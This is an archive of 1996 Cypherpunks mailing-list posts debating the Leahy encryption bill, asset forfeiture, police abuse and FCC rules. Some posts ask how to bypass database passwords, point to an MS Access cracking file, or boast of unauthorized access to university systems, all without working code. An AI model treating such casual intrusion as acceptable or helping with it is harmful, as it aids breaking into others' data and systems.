upon each reboot have the remailer process (which would have to be root
owned) check for the value of this? I am of course assuming that the owner
of the remailer has admin control over the box, which is kind of unscalable.
If someone does gain entry to the machine, he'd need root to skim through
the kernel memory, and since he wouldn't have access to the remailer src
(you don't have it online, right?) he'd have a hard time looking for what he
needed...

/rickt
_____________________________________________________________________
Rick Tait                                        rickt@psa.pencom.com
Unix cowboy, Technofuturist, Extropian, Crypto-anarchist, Brit Hacker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 11 Mar 1996 06:09:43 +0800
To: "Vladimir Z. Nuri" <WlkngOwl@unix.asb.com>
Subject: Re: rhetorical trickery
Message-ID: <199603102145.NAA10827@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:19 PM 3/10/96 -0800, Vladimir Z. Nuri wrote:
>please, will people stop sending me responses like the above? do you
>understand how the American legal system works? a person cannot
>be prosecuted without evidence. evidence cannot be illegally obtained.
>a person is not required to testify against oneself.  these are all
>basic long-established cornerstones of our legal system.

I'm sure that my friend who tried to argue about a speeding ticket in New
Jersey, had the bones around his eye socket broken and then was arrested
for "Resisting Arrest" will be comforted to hear this.  (BTW, a mutual
friend was a witness and confirmed the story.  I can't think of any reason
they would have to lie to me about the facts.)

Bill




------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 11 Mar 1996 06:09:46 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603102145.NAA10842@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:08 AM 3/10/96 -0500, JonWienke@aol.com wrote:
>In a message dated 96-03-09 04:05:26 EST, you write:
>
>>At  9:59 PM 3/8/96 -0800, Bill Stewart wrote:
>>>The pizza guy was a thug, but twice as many third-strikers got
>>>their third strike for marijuana as for all violent crimes combined.
>>>I assume most of these had large quantities, possibly intended for sale,
>>>and a number of them had real crimes as their previous felonies
>>>rather than Prohibition-related offenses.  But you can get legally
>>>serious quantities of marijuana by just growing a couple of plants.
>>
>>I wonder how many of these drug dealers previous "real crimes" were related
>>to using violence to protect their drug business, defense which would have
>>used the courts and police had drug dealing been legal.
>
>What difference does that make?  If you are deranged enough to murder someone
>because they are selling crack in your territory, you are deranged enough to
>shoot your manager after getting fired from McDonalds, or to do any number of
>heinous things that ahve nothing to do with drug laws.  Sick people will
>still do sick things, even if some of them are legalized.

Back over 20 years ago, some acquaintances at the time stopped working in
the drug trade because it became necessary to carry fire arms to protect
against having your drugs or money stolen.  Other people of course carried
the guns, and I assume used them at times.  This violence would not have
occurred had the drug trade been legal.

Remember that here in California, about 70% of the people think killing
someone is a suitable punishment for certain crimes.  Many people also
think that violence in defense of life or property is a reasonable act. 
Are all these people "deranged"?

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Mon, 11 Mar 1996 06:26:04 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: MS Access encryption?
In-Reply-To: <Pine.3.89.9603101522.A7261-0100000@dal1820.computek.net>
Message-ID: <Pine.SUN.3.91.960310134803.2189B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996, Ed Carp wrote:

> Anyone know how secure the encryption is that Microsoft uses in its 
> Access database product?  I was asked that by a client, but didn't know 
> the answer....thanks in advance.

Not. A file called "msdunce" was posted to comp.databases.ms-access a few 
months ago. Look for it on DejaNews or whatever.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Mar 1996 06:34:18 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <199603102200.OAA29839@ix16.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:56 AM 3/10/96 -0500, "Harry S. Hawk" <habs@warwick.com> wrote:
>> I wonder what exactly the FCC means by the term "Internet Phone."
>> Does this just mean that software like IPhone will be regulated, or
>> will this also apply
>The thing is that at "best" the Iphone people (et al), are sell
>Equipment!. NO ONE is SELLING phone service.. I mean Selling phone
>service means some guy in NYC putting a sign on a store front offering
>10 cents a minute calls "anyway where in the world."

Maybe nobody is selling phone service, and the internet provider is
selling packet-transfer service, but phone service _is_ being provided.
One possible response would be for the FCC to require internet providers to
block phone connections (highly unlikely; you could offer the service
on any port you wanted, and I think one of the versions runs over IRC);
another would be for them to block the sale of the software (tough
to block sale of Israeli software, much less free software.)

Bogus.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Mon, 11 Mar 1996 14:31:31 +0800
Subject: Re: rhetorical trickery
In-Reply-To: <199603102145.NAA10827@netcom7.netcom.com>
Message-ID: <9603101417.aa28560@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> At  1:19 PM 3/10/96 -0800, Vladimir Z. Nuri wrote:
> >please, will people stop sending me responses like the above? do you
> >understand how the American legal system works? a person cannot
> >be prosecuted without evidence. evidence cannot be illegally obtained.
> >a person is not required to testify against oneself.  these are all
> >basic long-established cornerstones of our legal system.
> 
> I'm sure that my friend who tried to argue about a speeding ticket in New
> Jersey, had the bones around his eye socket broken and then was arrested
> for "Resisting Arrest" will be comforted to hear this.  (BTW, a mutual
> friend was a witness and confirmed the story.  I can't think of any reason
> they would have to lie to me about the facts.)
> --Bill Frantz      

There is *some* justice in America.  The University of Wyoming had a Campus
Cop named Waters, who also worked for Information Technology and fancied
himself becoming the next Internet Sherlock Holms.  Unfortunately, IT canned
his ass for alleged violations of privacy before he could make a career out
of electronic snooping.  The closest he came to me in all the years I 
was using unauthorized access there, was giving me a ticket for driving on an
expired license.

Now days I'm getting too legit to quit.  Prof Van Baalen bought my idea of
Free Public Internet Access for Wyoming residents on a self educational UNIX
box, a spare Sparc 10 wired at T1 speed.  We go online by the Equinox >;) 
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 11 Mar 1996 03:58:25 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: rhetorical trickery
In-Reply-To: <5s9HkD33w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.91.960310143243.958B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Mar 1996, Dr. Dimitri Vulis wrote:

> Lance Deitweller posting as Vladimir Z. Nuri <vznuri@netcom.com> writes:
> > there is an infamous case of a child pornographer or pedophile in
> > California that is sometimes cited by law enforcement representatives
> > as a good example of the evils of encryption: supposedly he encrypted
> > his diary and it couldn't be unlocked by them. this was mentioned in
> > the article.
> 
> Did this really happen? I've never seen any concrete references to this
> incident and strongly suspect it's another urban legend.

There was an article in the July 1995 issue of Technology Review by
Dorothy Denning explaining the "evils of encryption" in defense of the
Clipper Chip which mentions this case.  I suspect that it actually
happened.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUMu5LZc+sv5siulAQHvggP/VpoFFQrtcRsahfI8NFkJUwj8AcQt6L/I
sJvfY+94XC2+Dlf2fzkcSFwPYyNejrNGL6veMcC0kjx5fMwZvUXlNPmSK0yf7Y05
kdIbMi7CrcoOuwwgKTPubN3RB/L+xa2AaT4UOMs29bOJ1lC6KRIwBG7kT+2dkzXq
GVpz3dzysUQ=
=rJcm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Mon, 11 Mar 1996 06:57:56 +0800
To: "cypherpunks@toad.com>
Subject: RE: rhetorical trickery
Message-ID: <01BB0E8F.24B0CF60@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri[

please, will people stop sending me responses like the above? do you
understand how the American legal system works? a person cannot
be prosecuted without evidence. evidence cannot be illegally obtained.
a person is not required to testify against oneself.  these are all
basic long-established cornerstones of our legal system.
...................................................................................


Please, please, when Nuri-logical makes a public post, will people stop copying him in their responses?  At least, not until you have read about the Clipper chip, the V-chip, key escrow, ITAR, the CDA, who those "four horsemen" are, etc., and understood how the American legal system works?

Personally, I am really amazed at all the times when people point out basic liberties to the NSA or the law enforcement agencies, and somebody says, well yes BUT so-and-so hypothetical situation might arise.

Why is there such deep fear about citizens? I'd say that some people there are high up on the list of creating a paranoia about life in the U.S. today.  I t is almost as if some people have a public "prosecute you" wish.

    ..
Blanc







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua E. Hill" <jehill@gauss.elee.calpoly.edu>
Date: Mon, 11 Mar 1996 12:56:28 +0800
To: cypherpunks@toad.com
Subject: Symantec Q&A passwords
Message-ID: <199603102313.PAA28956@hyperion.boxes.org>
MIME-Version: 1.0
Content-Type: text/plain


Well... this is only vaguely on topic, but:

Does anyone know how to circumvent a password on a Q&A (3.0)
database?  Symantec said that they would do it for $75... I
would imagine that means they use a trivial encryption system... 
Does anyone know if this is the case? (and if so, what system 
do they use?).

			Thank You,
			Joshua Hill

-----------------------------Joshua E. Hill-----------------------------
|                       Murphy's Military Laws:                        |
|                       3. Friendly fire ain't.                        |
-------jehill@<gauss.elee|galaxy.csc|w6bhz|tuba.aix>.calpoly.edu--------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 11 Mar 1996 05:41:26 +0800
To: cypherpunks@toad.com
Subject: MS Access encryption?
Message-ID: <Pine.3.89.9603101522.A7261-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know how secure the encryption is that Microsoft uses in its 
Access database product?  I was asked that by a client, but didn't know 
the answer....thanks in advance.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 11 Mar 1996 05:26:26 +0800
To: cypherpunks@toad.com
Subject: re: Bootable disks
Message-ID: <960310161546.2020ae8b@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>In Mar. 5 (?) Edupage, there's a blurb about a floppy drive that is
>compat with 1.44M disks but can also handle special 80M disks, allegedly
>available in April.

Several years ago Insite had a "floptical" drive that could handle both
regular 3 1/2" and special 20Mb flopical drives. Iomega followed suit and
there was an industry spec. Compression would yeid 40 Mb capacity to
a marketeer. (Can tell a floptical disk easily - the write protect slide 
is on the other side).

Was a great idea then that was marred by U$500 for the drive and U$20 for
the cartriges. Never flew.  

Three years development would give 80 Mb easily (100 Mb Iomega "ZIP" disks
could have been put in a normal 3 1/2 case - is a lot of waste space
on either side. Think it was kind of dumb that they didn't but suppose
there is a marketing reason - probably the same marketeers that insisted
that each new Bernoulli be incompatable with earlier ones.)

Major difference is that the floptical could be made bootable but then
it had a special SCSI card, did not plug into the normal floppy 
controller & have to tell the BIOS that drive B was not there. The card
then added a BIOS extension similar to what I mentioned in an earlier post 
to access the disk.

For that matter, any drive that has a controller on the bus *could* be made
bootable with a PROM. It is only those that plug into the parallel port
- all of which require special drivers - that would need "help".

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Mon, 11 Mar 1996 08:54:01 +0800
To: John Young <jya@pipeline.com>
Subject: Re: ADL_mil (militias and the USAF)
In-Reply-To: <199603102215.RAA05819@pipe2.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960310154752.8213C-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996, John Young wrote:

>    "ADL Special Report: The Militia Movement in America."
> 
>       A 1995 national survey by the ADL offers disturbing
>       evidence that the militia movement has continued to
>       grow. The ADL survey also found that many hard-core
>       militiamen believe that the United States Government
>       itself conducted the Oklahoma City bombing to create an
>       excuse for further depriving citizens of their
>       constitutional rights. A continuing flow of information
[...]
>    [Thanks to AF]

That info used to be available at http://www.pafb.af.mil/deomi/DEOMI.HTM
(the Defense Equal Opportunity Management Institute), under the "Special
Interest Groups" heading, but access was restricted to MilNet on Friday
when I pointed out, somewhat sarcastically, that they were violating the
ADL's copyrights. Geez, they *REALLY* don't want people accessing that
server; not only is it firewalled now, but they removed www.pafb.af.mil
from the public DNS (its IP address is 131.25.131.53). I guess the Air
Force can't take a joke (gee, I wonder why).

Anyway, if you're interested in a bunch of very interesting reports on
right-wing terrorist groups in the US, most of them dated August 1993, I
just might be able to put you in touch with someone who might have those
files in his or her N*tscape cache directory. My friend Cecelia points 
out that the ADL made a few silly mistakes, though, like getting Neo-Nazi
leader William Pierce's birthdate wrong (Pierce is the wacko who wrote 
The Turner Diaries, which inspired a tring of murders/bank robberies by 
The Order and, more recently, Timothy McVeigh).

The general thrust of DEOMI seems to be that people in non-combat posts in
the military have every right to be involved with these jokers in their
off hours. There are several .mil addresses on the openly Neo-Nazi
Stormfront list -- and they're not all plants. In general, they'll only
investigate you if your paranoid fantasies about the Zionist Occupational
Government prompt you to get up in a tower and start shooting people. 
Which has, of course, happened, so I have no problem whatsoever with the 
USAF (or anyone else) talking to the ADL, as long as rights are respected.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 11 Mar 1996 05:56:34 +0800
To: stewarts@ix.netcom.com
Subject: RE: FCC & Internet phones
Message-ID: <960310164021.2020ae8b@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


I rote:
>  You seem to forget that the Internet is just about the *only* electronic 
>  communications media not controlled/licensed by the FCC in the US. The 
>  FCC also prohibits use of cryptography by those with amateur licenses.

Bill wresponded:
>Oh, we remember it :-).  But actually, large chunks of the Internet's
>facilities _are_ on controlled or semi-controlled media, such as 
>frame relay (which the Feds just insisted had to be tariffed) or
>local private-line (which is often regulated by state PUCs.)

Do not disagree, just is not regulated by the FCC the same way radio 
stations are.

Today we think (if you do) of Zenith as manufacturer of computers (owned by
Thompson), cable TV decoders, and televisions (Samsung ?). However seventy
years ago, Commander MacDonald "willfully" (having notified Herbert Hoover)
started broadcasting station WJAZ in Chicago on a frequency reserved for
Canadian stations (have a copy of a photograph *somewhere* showing the
1925 station crew in Pirate costumes) in direct violation of a Department
of Commerce order.

Shortly thereafter Congress passed a law creating the FCC.

History tends to repeat itself.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Mar 1996 14:27:10 +0800
To: cypherpunks@toad.com
Subject: ADL_mil
Message-ID: <199603102215.RAA05819@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   "ADL Special Report: The Militia Movement in America."

      A 1995 national survey by the ADL offers disturbing
      evidence that the militia movement has continued to
      grow. The ADL survey also found that many hard-core
      militiamen believe that the United States Government
      itself conducted the Oklahoma City bombing to create an
      excuse for further depriving citizens of their
      constitutional rights. A continuing flow of information
      from ADL Regional offices around the country indicates
      militias are operating in at least 40 states, with
      membership reaching some 15,000, and that these numbers
      could rise still higher. The following is a 40-state
      summary of known militia activity.

   ADL_mil  (36 kb)


   [Thanks to AF]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomservo@access.digex.net (Scott Fabbri)
Date: Mon, 11 Mar 1996 06:48:49 +0800
To: cypherpunks@toad.com
Subject: Re: rhetorical trickery
Message-ID: <v02130500ad68b25e6f1a@[205.252.17.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

An entity self-representing as "Vladimir Z. Nuri" writes:

>sure, a government agent could insist, "well, don't be a bonehead.
>it's obviously his diary, and surely contains all his crimes against
>children".

A standard attitude among LEOs is: "if you're not guilty of something, what
are you hiding?" Skilled ones use this lever to get suspects to allow
searches of their property on the flimsiest of pretenses.

>ah yes, just as, obviously, even before trial, "the man is a criminal"

"Innocent until proven guilty" is at best an abstraction to most police.
Given the amount of time they have per case, on average, they're more
interested in slorking up whatever evidence they can against a suspect and
making a bust. Didn't Ed Meese say something along the lines of, "if they
weren't criminals, they wouldn't be involved with the police"?

ObCrypto: Having a fair amount of encrypted stuff around makes any given
piece stand out less. A couple dozen PGP-encrypted files with names like
"1994 1040 Schedule A" and "Business Contact List, 1Q 1995" is a hell of a
lot less suspicious than a single encrypted file called "detonate.pgp." :^)

Furthermore, if they don't believe me and I choose not to give them the
plaintext, isn't that my Fifth Amendment right? Or has that been waived in
cyberspace for our convenience?

Scott
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMUNUZuvEnOI8TfM9AQEzjwL/RC1kBe/R8aKru9z0PRFI8wwb+/qhMx8d
UFrZ/VA36xDDKY48muwVA+rF+e0tIn3n006DvEBcwMNJ4LfQ15KaVssXjOlDoE0R
mAp8umb/K6uK0bZ9+M4/qZe8e6by0VkW
=CBfe
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Mon, 11 Mar 1996 07:11:56 +0800
Subject: No Subject
Message-ID: <199603102218.RAA17249@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


d 96-03-10 11:44:01 EST, you write:

>Jim Bell wrote:
>
>> 2804. Unlawful use of encryption to obstruct justice
>>   Whoever willfully endeavors (by means of encryption) to (obstruct,
>>    impede, or prevent) the communication of (information in furtherance
>>    to a felony) (which may be prosecuted in a court of the United States),
>>    to an investigative or law enforcement officer shall...
>
>I think the following is a tad better:
>
>Whoever willfully endeavors (by means of encryption) to (obstruct,
>impede, or prevent) the communication of information (in furtherance
>to a felony (which may be prosecuted in a court of the United States)),
>to an investigative (or law enforcement) officer shall...

I prefer this:

2804.  [Deleted]

Top that!

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 11 Mar 1996 00:42:03 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy's guillotine
Message-ID: <199603101630.RAA08311@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:

> Let's look at the word "willfully".  Among other things, it implies
> knowledge; under US law, to be guilty you have to know you did something
> that you at least reasonably believe is an activity that you're not supposed
> to do.

Agreed, but it's precisely the sort of thing that is misinterpreted
by prosecutors and has to be resolved by a judge after a potentially
long stay in prison whilst awaiting trial.  (All depending on
circumstances of course).  Too close for comfort I'm afraid.


Jim Bell wrote:

> 2804. Unlawful use of encryption to obstruct justice
>   Whoever willfully endeavors (by means of encryption) to (obstruct,
>    impede, or prevent) the communication of (information in furtherance
>    to a felony) (which may be prosecuted in a court of the United States),
>    to an investigative or law enforcement officer shall...

I think the following is a tad better:

Whoever willfully endeavors (by means of encryption) to (obstruct,
impede, or prevent) the communication of information (in furtherance
to a felony (which may be prosecuted in a court of the United States)),
to an investigative (or law enforcement) officer shall...


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 11 Mar 1996 01:27:22 +0800
To: cypherpunks@toad.com
Subject: Explosives, Criminality, and Preemptive Action
Message-ID: <199603101703.SAA09526@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



At Sun, 10 Mar 1996 Timothy C. May wrote:
> At 7:06 AM 3/10/96, JonWienke@aol.com wrote:
> >Who says they were going to blow anything up?  It is perfectly legit for
> >farms to have large quantities of fertilizer around--they use it all the
> >time.  Same with diesel fuel--what are they supposed to run the tractors and
> >combines with?  Dog piss?  DUHHHH!  As far as having the instructions for
> >mixing them to go boom, who the hell made that a crime?  You could bust most
> >of the farmers in this country if you criminalize simultaneous posession of
> >fertilizer and diesel fuel.  Did these people ever actually mix any of the
> >fert. and fuel together?  Did they threaten to blow up anything?
> 
> 
> My personal belief, from the news reports I've read (which may be
> incorrect, of course), is that the ingredients were for use in a bomb,
> whether or not they'd ever have gone through with it or not. The ancillary
> items found (dozens of assault rifles, weapons manuals, patriot literature,
> crank, meth, etc.), and the stockpiling of ANFO precursors, suggests an
> Oklahoma City-type scenario.

Hey!, if I lived on a farm I would no doubt possess similar amounts
of fertilizer and diesel.  I would also possess a few dozen assault
rifles if I could afford to (not that I'm a gun nut [I do happen to
enjoy shooting, and would doubtless own a few if I lived on a farm]
but would have "stocked up" before Klintons assault rifle bill.)
I also possess weapons manuals (ranging from bullwhips to blowguns
to 66mm anti tank weapons) and what you would call patriot literature
(ranging from books on Jefferson, on the civil war ("The South was
Right"), to The Turner Diaries.)  I am also an ocaissional drug user,
so you may find varying amounts of coke/crack, meth, horse, LSD, peyote,
and ecstasy in my abode.  In addition to this you would find books on
lockpicking, hacking, drug manuafacture, holocaust revisionism,
credit card fraud, false ID, smuggling, gun-running and tax evasion.
You would also find some very violent movies in my collection.

But, despite all of these circumstances, I assure you that I have not
(and would, ney, could not) commit any non-victimless crime.  I am an
out and out pacifist Libertarian.


> This is what I think was objective reality.

I think this is what I call circumstancial evidence.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 11:52:36 +0800
To: Voters Telecommunications Watch <jim@rsa.com
Subject: Do you feel lucky, punk?
Message-ID: <m0tvx9W-0008zBC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[from Cypherpunks]

Those of you who are confident that the Leahy bill won't be interpreted to 
punish innocent people (for example, operators of encrypted anonymous 
remailers) who are not directly engaged in criminal activity should read the 
following article, that appeared as the George Will column March 10, in my 
local paper.  Maybe it will give you a healthy dose of REALITY (remember 
reality, fellows?):

"Taking Property from innocents doesn't fit conservative ideals"  by George 
F. Will.

In 1827, in a case concerning the forfeiture of a Spanish ship used for 
piracy, the U.S. Supreme Court held that the owner could lose his ship even 
if he was not even aware of the use of the ship for piracy:  "the thing is 
here primarily considered as the offender, or rather the offense is attached 
primarily to the thing."

That, and a long line of cases in that vein, is why the court last week said 
Tina Bennis has no right to compensation for her half-interest in the car 
she co-owned with her husband John and which was forfeited after he was 
convicted in Detroit of engaging in sexual activity with a prostitute in the 
car.

The court was divided 5-4 in rejecting Mrs. Bennis' contention that the 
forfeiture violated her 14th amendment right to due process and her Fifth 
Amendment right not to have property take without just conpensation.  
Justice John Paul Stevens, joined in dissent by David H. Souter and Stephen 
Breyer (anthony M. Kennedy dissented separately), condemned the "blatant 
unfairness" of punishing an innocent person.  And Justice Clarence Thomas, 
although concurring separately in the opinion written by Chief Justice 
WIlliam H. Rehnquist and joined by Sandra Day O'Connor, Antonin Scalia, Ruth 
Bader Ginsburg and Thomas, said that what was done to Mrs. Bennis by 
Michigan law was "intensely undesireable."

Because many governments are increasingly agressive in their use of 
forfeiture as punishment for prostitution, drug, and other offenses, this 
decision, although supported by the most conservative justices, should 
trouble conservatives: it involves conflicts between three things they 
value- deference to states' legislative judgments, fidelity to precedent and 
respect for property rights.

Bennis made his mistake in 1988 in an 11-year old Pontiac he and his wife 
had recently purchased for $600.  The trial court judge had discretion to 
order payment of half the sale proceeds to "the innocent co-titleholder," 
but commented that "there's practically nothing left" after deduction of 
police, prosecutorial, and court costs."

Ginsburg noted that the question at issue was not whether compensating Mrs. 
Bennis would have been fair but whether compensation was a constitutional 
right.  And Ginsburg's concurring opinion suggests that she would have 
affirmed such a right had not the car belonged as much to Mr. Bennis as to 
Mrs. Bennis.

Although Mrs. Bennis neither consented to nor knew of the misuse of the car, 
Rehnquist cited the court's language in a 1926 case, that it is common "for 
the law to visit upon the owner of property the unpleasant consequences of 
the unauthorized action of one to whom he has entrusted it."  That practice, 
the court had said five years earlier, is "too firmly fixed in the punitive 
and remedial jurisprudence of the country to be now displaced."

Certainly the court should not casually unsettle what it has firmly fixed.  
Nor should the court relieve Congress of its role in correcting dubious 
legal practices.  the chairman of the House Judiciary Committee, Rep. Henry 
Hyde of Illinois, has drafted the Civil Asset Forfeiture Reform Act that 
would, among other things, strengthen protection of innocent property owners.

Still, sometimes the court has had to say, in effect, "Well, come to think 
about it... ."  It took four years of carnage and then the 13th amendment to 
correct what the court did in 1857 in Dred Scott vs. Sanford.  But in other 
cases the court has tidied up after itself.

In 1896 in Plessy vs. Ferguson, the court held that "separate but equal" 
public facilities segregated by race were compatible with the 14th 
Amendment's guarantee of equal protection of the laws.  Later, the court 
conducted a protracted retreat from that position. 

In 1905 in Lockner vs. New York, as in similar cases, the court held that a 
New York law limiting bakers to a 10-hour workday violatedd teh DUe Process 
clause.  By 1963, Justice Hugo Black could assert that the Lochner doctrint 
of "substantive due process," that the court can overturn laws it considers 
unwise, "has long since been discarded."  (Actually, it has long since been 
smuggled into liberal jurisprudence to support a different social policy 
agenda.)

In his obviously uneasy confurring opinion in the court's decision about 
Mrs. Bennis' car, Thomas says the case "is ultimately a reminder that the 
Federal Constitution does not prohibit everything that is intensely 
undesireable."

Quite so.  So it is time for the political branches of state governments and 
the federal government to act on the clear signals from Thomas and others 
concerning the need to protect innocent persons who cannot reasonably be 
considered culpably negligent concerning the misuse of their property.

[end of article]


To those suckers who say that they genuinely believe that the operator of an 
anonymous encrypted remailer will not be subject to criminal or civil 
penalties for what ends up being the misuse of their system, I would like to 
re-state a quote from the article above:

"Although Mrs. Bennis neither consented to nor knew of the misuse of the car, 
Rehnquist cited the court's language in a 1926 case, that it is common "for 
the law to visit upon the owner of property the unpleasant consequences of 
the unauthorized action of one to whom he has entrusted it."  That practice, 
the court had said five years earlier, is "too firmly fixed in the punitive 
and remedial jurisprudence of the country to be now displaced."  "

Does this sound familiar?  Doesn't it hit just a bit too close to home?  I 
argue that a person who runs an anonymous encrypted remailer could be 
clearly claimed to be  "entrusting" that "property" to someone else, under 
the meaning of the above paragraph.  At least, that is the position the 
prosecutors could surely take, especially given this Supreme Court decision.


In fact, I would argue that a remailer operator will actually be considered 
MORE responsible, legally, than Mrs. Bennis:  The abuser of _her_ property, 
Mr. Bennis, was in fact the co-owner of that property, and it is doubtful 
that Mrs. Bennis COULD have denied to Mr. Bennis, practically or legally,  
the opportunity to abuse that property.  On the other hand, the operator of 
an anonymous encrypted remailer is, in effect, "giving out the keys" to that 
remailer (giving authorization to use it) to anyone at any time, with no 
checking or other specific authorization, to people who have no legal 
ownership in that remailer.   In fact, the system is (at least arguably) 
helping to cover up after those abuses.  If those self-selected people 
commit crimes using it, who else is responsible?

Question:  If the Supreme Court is willing to take away Mrs. Bennis' 
interest in that car under THOSE circumstances, do you really believe that 
it WOULD REFUSE to allow a prosecutor to decide that the operator of an 
abused remailer should be prosecuted (or his property taken by government in 
a forfeiture action)?

Frankly, I don't know how rude I must be before reality sinks in to your 
brains:  If you people continue to insist that this Leahy bill won't be 
abused, you truly do need to wake up before you end up screwing the rest of 
us "out here."  Your foolish endorsements of this Leahy bill play directly 
into the hands of those who want to ban the EFFECTIVE use of encryption.

Go ahead, endorse the bill CONDITIONALLY on the removal of that offending 
section.  But you should make it quite clear that keeping that section 
should kill the entire bill.  You have been warned.

Is it any coincidence that we first heard about this Leahy bill much less 
than a week after the decision that Mr. Will speaks of?  Is it possible 
Leahy was waiting to see if the SC would allow him to misuse the wording of 
that proposed law?  Having gotten the go-ahead, out pops the new bill.  As 
if on cue.


